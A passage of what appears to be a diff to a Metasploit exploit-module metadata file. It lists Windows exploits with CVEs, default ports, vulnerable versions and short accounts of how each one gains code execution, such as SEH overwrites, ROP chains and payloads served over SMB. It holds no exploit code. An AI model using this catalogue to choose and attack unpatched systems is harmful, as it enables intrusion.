The Linux version wasn't tested.", - "references": [ - "CVE-2017-18044", - "URL-https://www.securifera.com/advisories/sec-2017-0001/" - ], - "platform": "Windows", - "arch": "", - "rport": 8400, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Commvault Communications Service (cvd) / Microsoft Windows 7 and higher" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/misc/commvault_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/misc/commvault_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/crosschex_device_bof": { - "name": "Anviz CrossChex Buffer Overflow", - "fullname": "exploit/windows/misc/crosschex_device_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-11-28", - "type": "exploit", - "author": [ - "Luis Catarino ", - "Pedro Rodrigues ", - "agalway-r7", - "adfoster-r7" - ], - "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n triggering a stack buffer overflow.", - "references": [ - "CVE-2019-12518", - "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html", - "EDB-47734" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Crosschex Standard x86 <= V4.3.12" - ], - "mod_time": "2020-03-05 14:48:37 +0000", - "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/crosschex_device_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/cve_2022_28381_allmediaserver_bof": { - "name": "ALLMediaServer 1.6 SEH Buffer Overflow", - "fullname": "exploit/windows/misc/cve_2022_28381_allmediaserver_bof", - "aliases": [], - 
"rank": 400, - "disclosure_date": "2022-04-01", - "type": "exploit", - "author": [ - "Hejap Zairy Al-Sharif" - ], - "description": "This module exploits a stack buffer overflow leading to a SEH handler overwrite\n in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error\n within the handling of a HTTP request. Note that this exploit will only work\n against x86 or WoW64 targets, x64 is not supported at this time.", - "references": [ - "CVE-2022-28381", - "URL-https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow" - ], - "platform": "Windows", - "arch": "x86", - "rport": 888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ALLMediaServer 1.6" - ], - "mod_time": "2022-04-01 17:57:27 +0000", - "path": "/modules/exploits/windows/misc/cve_2022_28381_allmediaserver_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/cve_2022_28381_allmediaserver_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/delta_electronics_infrasuite_deserialization": { - "name": "Delta Electronics InfraSuite Device Master Deserialization", - "fullname": "exploit/windows/misc/delta_electronics_infrasuite_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-05-17", - "type": "exploit", - "author": [ - "Anonymous", - "Shelby Pace" - ], - "description": "Delta Electronics InfraSuite Device Master versions below v1.0.5 have an\n unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'\n method of the 'Device-Gateway-Status' process.\n\n The 'ParseUDPPacket()' method reads user-controlled packet data and eventually\n calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,\n leading 
to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.", - "references": [ - "CVE-2023-1133", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-672/", - "URL-https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 10100, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows CMD" - ], - "mod_time": "2023-06-07 16:42:01 +0000", - "path": "/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/misc/delta_electronics_infrasuite_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/disk_savvy_adm": { - "name": "Disk Savvy Enterprise v10.4.18", - "fullname": "exploit/windows/misc/disk_savvy_adm", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-01-31", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in Disk Savvy Enterprise v10.4.18, caused by improper bounds\n checking of the request sent to the built-in server. 
This module\n has been tested successfully on Windows 7 SP1 x86.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 9124, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Disk Savvy Enterprise v10.4.18" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/disk_savvy_adm.rb", - "is_install_path": true, - "ref_name": "windows/misc/disk_savvy_adm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/doubletake": { - "name": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", - "fullname": "exploit/windows/misc/doubletake", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-06-04", - "type": "exploit", - "author": [ - "ri0t " - ], - "description": "This module exploits a stack buffer overflow in the authentication mechanism of\n NSI Doubletake which is also rebranded as HP Storage Works. 
This vulnerability\n was found by Titon of Bastard Labs.", - "references": [ - "CVE-2008-1661", - "OSVDB-45924" - ], - "platform": "Windows", - "arch": "", - "rport": 1100, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "doubletake 4.5.0", - "doubletake 4.4.2", - "doubletake 4.5.0.1819" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/doubletake.rb", - "is_install_path": true, - "ref_name": "windows/misc/doubletake", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/eiqnetworks_esa": { - "name": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", - "fullname": "exploit/windows/misc/eiqnetworks_esa", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-24", - "type": "exploit", - "author": [ - "MC ", - "ri0t ", - "kf " - ], - "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the LICMGR_ADDLICENSE command, a stack-based\n buffer overflow occurs. 
This module has only been tested\n against ESA v2.1.13.", - "references": [ - "CVE-2006-3838", - "OSVDB-27526", - "BID-19163", - "ZDI-06-024" - ], - "platform": "Windows", - "arch": "", - "rport": 10616, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "EnterpriseSecurityAnalyzerv21 Universal", - "EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English", - "EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2", - "EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1", - "Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2", - "Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2", - "Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", - "iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2", - "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", - "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", - "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English", - "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2", - "Top Layer Network Security 
Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/eiqnetworks_esa.rb", - "is_install_path": true, - "ref_name": "windows/misc/eiqnetworks_esa", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/eiqnetworks_esa_topology": { - "name": "eIQNetworks ESA Topology DELETEDEVICE Overflow", - "fullname": "exploit/windows/misc/eiqnetworks_esa_topology", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-25", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the DELETEDEVICE command in the Topology\n server, a stack-based buffer overflow occurs.\n\n This module has only been tested against ESA v2.1.13.", - "references": [ - "CVE-2006-3838", - "OSVDB-27528", - "BID-19164" - ], - "platform": "Windows", - "arch": "", - "rport": 10628, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb", - "is_install_path": true, - "ref_name": "windows/misc/eiqnetworks_esa_topology", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/enterasys_netsight_syslog_bof": { - "name": "Enterasys NetSight nssyslogd.exe Buffer Overflow", - "fullname": "exploit/windows/misc/enterasys_netsight_syslog_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-19", - "type": "exploit", - "author": [ - "Jeremy Brown", - "rgod ", - "juan vazquez " - ], - "description": "This 
module exploits a stack buffer overflow in Enterasys NetSight. The\n vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially\n crafted PRIO from a syslog message. The module has been tested successfully on\n Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.", - "references": [ - "CVE-2011-5227", - "OSVDB-77971", - "BID-51124", - "ZDI-11-350" - ], - "platform": "Windows", - "arch": "", - "rport": 514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Enterasys NetSight 4.0.1.34 / Windows XP SP3", - "Enterasys NetSight 4.0.1.34 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/enterasys_netsight_syslog_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/eureka_mail_err": { - "name": "Eureka Email 2.2q ERR Remote Buffer Overflow", - "fullname": "exploit/windows/misc/eureka_mail_err", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-22", - "type": "exploit", - "author": [ - "Francis Provencher (Protek Research Labs)", - "Dr_IDE", - "dookie", - "jduck " - ], - "description": "This module exploits a buffer overflow in the Eureka Email 2.2q\n client that is triggered through an excessively long ERR message.\n\n NOTE: this exploit isn't very reliable. 
Unfortunately reaching the\n vulnerable code can only be done when manually checking mail (Ctrl-M).\n Checking at startup will not reach the code targeted here.", - "references": [ - "CVE-2009-3837", - "OSVDB-59262", - "EDB-10235" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win XP SP3 English", - "Win XP SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/eureka_mail_err.rb", - "is_install_path": true, - "ref_name": "windows/misc/eureka_mail_err", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_cnct_group": { - "name": "Firebird Relational Database CNCT Group Number Buffer Overflow", - "fullname": "exploit/windows/misc/fb_cnct_group", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-31", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in Firebird SQL Server. A specially\n crafted packet can be sent which will overwrite a pointer allowing the attacker to\n control where data is read from. Shortly, following the controlled read, the\n pointer is called resulting in code execution.\n\n The vulnerability exists with a group number extracted from the CNCT information,\n which is sent by the client, and whose size is not properly checked.\n\n This module uses an existing call to memcpy, just prior to the vulnerable code,\n which allows a small amount of data to be written to the stack. 
A two-phases\n stack pivot allows to execute the ROP chain which ultimately is used to execute\n VirtualAlloc and bypass DEP.", - "references": [ - "CVE-2013-2492", - "OSVDB-91044" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows FB 2.5.2.26539", - "Windows FB 2.5.1.26351", - "Windows FB 2.1.5.18496", - "Windows FB 2.1.4.18393", - "Debug" - ], - "mod_time": "2018-10-27 20:54:14 +0000", - "path": "/modules/exploits/windows/misc/fb_cnct_group.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_cnct_group", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_isc_attach_database": { - "name": "Firebird Relational Database isc_attach_database() Buffer Overflow", - "fullname": "exploit/windows/misc/fb_isc_attach_database", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38607", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/fb_isc_attach_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_isc_attach_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/misc/fb_isc_create_database": { - "name": "Firebird Relational Database isc_create_database() Buffer Overflow", - "fullname": "exploit/windows/misc/fb_isc_create_database", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38606", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/fb_isc_create_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_isc_create_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/fb_svc_attach": { - "name": "Firebird Relational Database SVC_attach() Buffer Overflow", - "fullname": "exploit/windows/misc/fb_svc_attach", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38605", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Firebird WI-V1.5.3.4870 WI-V1.5.4.4910", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 
+0000", - "path": "/modules/exploits/windows/misc/fb_svc_attach.rb", - "is_install_path": true, - "ref_name": "windows/misc/fb_svc_attach", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/gh0st": { - "name": "Gh0st Client buffer Overflow", - "fullname": "exploit/windows/misc/gh0st", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-07-27", - "type": "exploit", - "author": [ - "Professor Plum" - ], - "description": "This module exploits a Memory buffer overflow in the Gh0st client (C2 server)", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Gh0st Beta 3.6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/gh0st.rb", - "is_install_path": true, - "ref_name": "windows/misc/gh0st", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/gimp_script_fu": { - "name": "GIMP script-fu Server Buffer Overflow", - "fullname": "exploit/windows/misc/gimp_script_fu", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-18", - "type": "exploit", - "author": [ - "Joseph Sheridan", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in the script-fu server\n component on GIMP <= 2.6.12. 
By sending a specially crafted packet, an\n attacker may be able to achieve remote code execution under the context\n of the user.\n\n This module has been tested on GIMP for Windows from installers\n provided by Jernej Simoncic.", - "references": [ - "CVE-2012-2763", - "OSVDB-82429", - "BID-53741", - "EDB-18956", - "URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html" - ], - "platform": "Windows", - "arch": "", - "rport": 10008, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1", - "GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/gimp_script_fu.rb", - "is_install_path": true, - "ref_name": "windows/misc/gimp_script_fu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_cmd_exec": { - "name": "HP Data Protector 8.10 Remote Command Execution", - "fullname": "exploit/windows/misc/hp_dataprotector_cmd_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-11-02", - "type": "exploit", - "author": [ - "Christian Ramirez", - "Henoch Barrera", - "Matthew Hall " - ], - "description": "This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary\n commands can be executed by sending crafted requests with opcode 28 to the OmniInet\n service listening on the TCP/5555 port. Since there is a strict length limitation on\n the command, rundll32.exe is executed, and the payload is provided through a DLL by a\n fake SMB server. 
This module has been tested successfully on HP Data Protector 8.1 on\n Windows 7 SP1.", - "references": [ - "CVE-2014-2623", - "OSVDB-109069", - "EDB-34066", - "URL-https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 8.10 / Windows" - ], - "mod_time": "2022-02-15 18:03:13 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_crs": { - "name": "HP Data Protector Cell Request Service Buffer Overflow", - "fullname": "exploit/windows/misc/hp_dataprotector_crs", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-03", - "type": "exploit", - "author": [ - "e6af8de8b1d4b2b6d5ba2610cbf9cd38", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. 
This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.", - "references": [ - "CVE-2013-2333", - "OSVDB-93867", - "BID-60309", - "ZDI-13-130" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "HP Data Protector 6.20 build 370 / Windows XP SP3", - "HP Data Protector 7.00 build 72 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_crs.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_crs", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_dtbclslogin": { - "name": "HP Data Protector DtbClsLogin Buffer Overflow", - "fullname": "exploit/windows/misc/hp_dataprotector_dtbclslogin", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-09", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The\n overflow occurs during the login process, in the DtbClsLogin function provided by\n the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an\n insecure way with the username. 
A successful exploitation will lead to code execution\n with the privileges of the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server\n Service) process, which runs as SYSTEM by default.", - "references": [ - "CVE-2010-3007", - "OSVDB-67973", - "BID-43105", - "ZDI-10-174", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535" - ], - "platform": "Windows", - "arch": "", - "rport": 3817, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_dtbclslogin", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_encrypted_comms": { - "name": "HP Data Protector Encrypted Communication Remote Command Execution", - "fullname": "exploit/windows/misc/hp_dataprotector_encrypted_comms", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-04-18", - "type": "exploit", - "author": [ - "Jon Barg", - "Ian Lovering" - ], - "description": "This module exploits a well known remote code execution exploit after establishing encrypted\n control communications with a Data Protector agent. This allows exploitation of Data\n Protector agents that have been configured to only use encrypted control communications.\n\n This exploit works by executing the payload with Microsoft PowerShell so will only work\n against Windows Vista or newer. 
Tested against Data Protector 9.0 installed on Windows\n Server 2008 R2.", - "references": [ - "CVE-2016-2004", - "URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_encrypted_comms", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_exec_bar": { - "name": "HP Data Protector Backup Client Service Remote Code Execution", - "fullname": "exploit/windows/misc/hp_dataprotector_exec_bar", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-01-02", - "type": "exploit", - "author": [ - "Aniway.Anyway ", - "juan vazquez " - ], - "description": "This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code\n execution. The vulnerability exists in the EXEC_BAR operation, which allows to\n execute arbitrary processes. 
This module has been tested successfully on HP Data\n Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.", - "references": [ - "CVE-2013-2347", - "BID-64647", - "ZDI-14-008", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422", - "URL-http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 6.20 build 370 / VBScript CMDStager", - "HP Data Protector 6.20 build 370 / Powershell" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_exec_bar", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_install_service": { - "name": "HP Data Protector 6.10/6.11/6.20 Install Service", - "fullname": "exploit/windows/misc/hp_dataprotector_install_service", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-11-02", - "type": "exploit", - "author": [ - "Ben Turner" - ], - "description": "This module exploits HP Data Protector OmniInet process on Windows only.\n This exploit invokes the install service function which allows an attacker to create a\n custom payload in the format of an executable.\n\n To ensure this works, the SMB server created in MSF must have a share called Omniback\n which has a subfolder i386, i.e. 
\\\\192.168.1.1\\Omniback\\i386\\", - "references": [ - "CVE-2011-0922", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 6.10/6.11/6.20 / Windows" - ], - "mod_time": "2022-05-11 12:40:43 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_install_service.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_install_service", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_new_folder": { - "name": "HP Data Protector Create New Folder Buffer Overflow", - "fullname": "exploit/windows/misc/hp_dataprotector_new_folder", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-12", - "type": "exploit", - "author": [ - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in HP Data Protector 5. The overflow\n occurs in the creation of new folders, where the name of the folder is handled in a\n insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the\n folder name is split in fragments in this insecure copy. Because of this, this module\n uses egg hunting to search a non corrupted copy of the payload in the heap. On the other\n hand the overflowed buffer is stored in a frame protected by stack cookies, because of\n this SEH handler overwrite is used.\n\n Any user of HP Data Protector Express is able to create new folders and trigger the\n vulnerability. Moreover, in the default installation the 'Admin' user has an empty\n password. 
Successful exploitation will lead to code execution with the privileges of\n the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server Service) process, which\n runs as SYSTEM by default.", - "references": [ - "CVE-2012-0124", - "OSVDB-80105", - "BID-52431", - "URL-https://www.rapid7.com/blog/post/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124" - ], - "platform": "Windows", - "arch": "", - "rport": 3817, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector Express 6.0.00.11974 / Windows XP SP3", - "HP Data Protector Express 5.0.00.59287 / Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_new_folder", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_traversal": { - "name": "HP Data Protector Backup Client Service Directory Traversal", - "fullname": "exploit/windows/misc/hp_dataprotector_traversal", - "aliases": [], - "rank": 500, - "disclosure_date": "2014-01-02", - "type": "exploit", - "author": [ - "Brian Gorenc", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability in the Hewlett-Packard Data\n Protector product. The vulnerability exists in the Backup Client Service (OmniInet.exe)\n and is triggered when parsing packets with opcode 42. 
